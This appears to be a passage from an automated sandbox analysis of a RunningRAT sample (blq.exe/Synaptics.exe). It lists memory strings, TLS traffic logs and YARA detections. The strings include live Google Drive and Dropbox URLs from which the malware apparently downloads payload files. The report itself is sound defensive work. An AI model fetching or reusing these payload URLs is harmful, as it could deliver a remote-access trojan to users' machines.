                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~~
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, ~DF601ED631F8CE1B03.TMP.5.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/x
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007692000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRZFR
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRZFRT
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, ~DF601ED631F8CE1B03.TMP.5.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49758 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49759 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49766 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49767 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49780 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49781 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49785 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49786 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49796 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49797 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49808 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49807 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49812 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49813 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49815 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49828 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49829 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49830 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49838 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49844 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49853 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49861 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49862 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49872 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49877 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49899 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49918 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49927 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49926 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49943 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49962 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49963 version: TLS 1.2

                          E-Banking Fraud

                          barindex
                          Checks if browser processes are running
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command4_2_10002BC3

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: blq.exe, type: SAMPLEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPEDMatched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
